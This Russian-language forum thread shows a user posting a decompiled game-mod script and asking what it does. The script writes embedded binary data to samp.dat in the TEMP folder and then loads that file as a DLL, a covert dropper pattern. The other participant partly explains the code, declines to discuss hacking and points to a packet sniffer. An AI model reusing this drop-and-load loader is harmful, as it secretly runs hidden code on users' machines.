Что делает этот код?

[Andrew Garfield]

Код:

:Noname_21001
0AA2: 0@ = load_library "kernel32.dll" // IF and SET 
0AA4: 1@ = get_proc_address "GetEnvironmentVariableA" library 0@ // IF and SET 
alloc 2@ 260 
0AA5: call 1@ num_params 3 pop 0 260 2@ "TEMP" 
alloc 4@ 260 
format 4@ "%s\\samp.dat" 2@ 
0AA2: 0@ = load_library "msvcrt.dll" // IF and SET 
0AA4: 1@ = get_proc_address "fopen" library 0@ // IF and SET 
0AA7: call_function 1@ num_params 2 pop 2 "wb" 4@ 3@ 
0AA4: 1@ = get_proc_address "fwrite" library 0@ // IF and SET 
0AC6: 5@ = label @Noname_9 offset 
0AA5: call 1@ num_params 4 pop 4 3@ 1 20992 5@ 
0AA4: 1@ = get_proc_address "fclose" library 0@ // IF and SET 
0AA5: call 1@ num_params 1 pop 1 3@ 
0AA2: 6@ = load_library 4@ // IF and SET 

:Noname_21250
wait 100 
jump @Noname_21250

Может быть кто-нибудь знает?
Заранее спасибо.

[p51x]

Ну так все ж ясно, если код-то читать. Открывает и записывает данные в файл, а потом зацикливается.

[Andrew Garfield]

Цитата:

Сообщение от p51x

Ну так все ж ясно, если код-то читать. Открывает и записывает данные в файл, а потом зацикливается.

А где сам файл этот находится? Если честно, то не понятно.

[p51x]

в папке темп, вы и эти 4 буквы не смогли распознать?

[Andrew Garfield]

Цитата:

Сообщение от p51x

в папке темп, вы и эти 4 буквы не смогли распознать?

Нету там этого файла, в том то и дело. Я не программист, просто очень нужно знать куда идут данные, которые записываются в "samp.dat". Был бы очень благодарен, если бы вы помогли мне. Еще хотелось бы узнать почему в данном коде присутствуют файлы "kernel32.dll" и "msvcrt.dll" , это же вроде стандартные библиотеки Windows? Причем они здесь? :C

[p51x]

Цитата:

Нету там этого файла, в том то и дело.

Где вы его смотрите? Надеюсь в AppData\Local\... ?

Цитата:

Я не программист, просто очень нужно знать куда идут данные, которые записываются в "samp.dat".

Тогда вы не там смотрите.

Цитата:

Был бы очень благодарен, если бы вы помогли мне.

Чем? Взлом здесь не принято обсуждать.

Цитата:

Еще хотелось бы узнать почему в данном коде присутствуют файлы "kernel32.dll" и "msvcrt.dll" , это же вроде стандартные библиотеки Windows? Причем они здесь?

Имеено потому что это стандартные библиотеки винды и потому что из них берутся используемые функции.

[Andrew Garfield]

Цитата:

Сообщение от p51x

Где вы его смотрите? Надеюсь в AppData\Local\... ?

Да-да, смотрю именно там.

Цитата:

Чем? Взлом здесь не принято обсуждать.

Тема ведь не про взлом Мне просто нужно знать куда отправляются значения, которые записывает этот файл.

Цитата:

Тогда вы не там смотрите.

Возможно, где еще этот файл может находиться? Он сам по себе не удаляется?

[p51x]

Тогда ставьте снифер и смотрите.

[Andrew Garfield]

Цитата:

Сообщение от p51x

Тогда ставьте снифер и смотрите.

Что такое снифер? Может быть посоветуете какой-нибудь?

[p51x]

Т.е. вас забанили в гугле и вики? https://en.wikipedia.org/wiki/Packet_analyzer

Или вы просто прикидываетесь?